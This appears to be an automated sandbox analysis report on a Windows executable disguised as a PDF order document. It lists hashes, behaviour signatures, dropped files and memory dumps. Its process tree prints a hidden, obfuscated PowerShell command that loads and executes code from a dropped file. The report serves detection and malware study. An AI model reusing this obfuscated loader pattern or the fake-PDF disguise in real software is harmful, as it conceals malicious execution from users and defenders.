Overview

overview

10

Static

static

1

COMANDA FI...df.exe

windows7-x64

10

COMANDA FI...df.exe

windows10-2004-x64

5

Analysis

  • max time kernel
    91s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231201-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231201-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-12-2023 02:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    COMANDA FINALAZD33166-pdf.exe

  • Size

    699KB

  • MD5

    9444e71802e12684478363233fd62c92

  • SHA1

    f2b4bd9162b591b2a2f4202934145864e16053fb

  • SHA256

    844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41

  • SHA512

    fec573d2b453086f2ed0b8b11824e4626fb3712134a707f100b9b2704c489fffc1259646979b0c7ebeb032421163b35beed13d2772ac02a7dd08bf7723821805

  • SSDEEP

    12288:WwFGHEXEzFGj9F5qx5DJlm2HlzYmdMylgimtdYM3O0V7bbJ:W5HEXl9y1lrz7lgZtub0V7B

Score
5/10

Malware Config

Signatures

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\COMANDA FINALAZD33166-pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\COMANDA FINALAZD33166-pdf.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2260
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Obscurantic=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Thermistor\Bruseren.Ple';$Ejendomsselskab=$Obscurantic.SubString(49841,3);.$Ejendomsselskab($Obscurantic)"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3112
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 2440
        3⤵
        • Program crash
        PID:3064
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3112 -ip 3112
    1⤵
      PID:4100

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini
      Filesize

      32B

      MD5

      a8ca1db6ae34f5e5c152094f44f92476

      SHA1

      9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

      SHA256

      1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

      SHA512

      e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_irj4n1d0.esl.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Indoperere.Bag
      Filesize

      299KB

      MD5

      740aba5e4e37d6e24e6322b0fb20b7e7

      SHA1

      6b92a45c9b518e1fe51192c27bd81db51f2b90d4

      SHA256

      a47e49459ad8874693970dbe048982e5afd0ffee2644e03a3ac147be2d012609

      SHA512

      2aca469279d46bbfc84fac52ee8ebdf8b58256f9009e7651480bc8d0fb07327107ee71e526783e8553e499f38a4b977de3e3fdadd4bbda9c8df37423a21c81f3

      Download Submit

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Thermistor\Bruseren.Ple
      Filesize

      48KB

      MD5

      b37bbcef093ffdd4c3be4dc919f6e830

      SHA1

      5ef5132e6f4021d672ba3844d2542e2258d22b72

      SHA256

      0c0dcc2234bc3f9baf5c35eb8ea2a77ca0e93015a6cb05de69890893a4b6daad

      SHA512

      9e8a8e2b84f366c0fc2edfa43c6781e88f99621549f0564efadd9d8facc975d1bbab048663b7c6e13ff53444d4f98d058664040dd6c67fde01a7500f38f3a9ba

      Download Submit

    • memory/3112-183-0x00000000062D0000-0x0000000006624000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3112-186-0x0000000007720000-0x00000000077B6000-memory.dmp

      Filesize

      600KB

      Download

    • memory/3112-171-0x00000000057A0000-0x00000000057C2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3112-168-0x0000000005370000-0x0000000005380000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3112-178-0x0000000006150000-0x00000000061B6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3112-172-0x0000000005940000-0x00000000059A6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3112-170-0x0000000005370000-0x0000000005380000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3112-184-0x0000000006740000-0x000000000675E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3112-185-0x0000000006790000-0x00000000067DC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3112-167-0x00000000733B0000-0x0000000073B60000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3112-187-0x0000000006C90000-0x0000000006CAA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3112-188-0x0000000006CE0000-0x0000000006D02000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3112-189-0x0000000007D70000-0x0000000008314000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3112-169-0x00000000059B0000-0x0000000005FD8000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/3112-191-0x00000000089A0000-0x000000000901A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/3112-166-0x0000000003180000-0x00000000031B6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/3112-194-0x00000000733B0000-0x0000000073B60000-memory.dmp

      Filesize

      7.7MB

      Download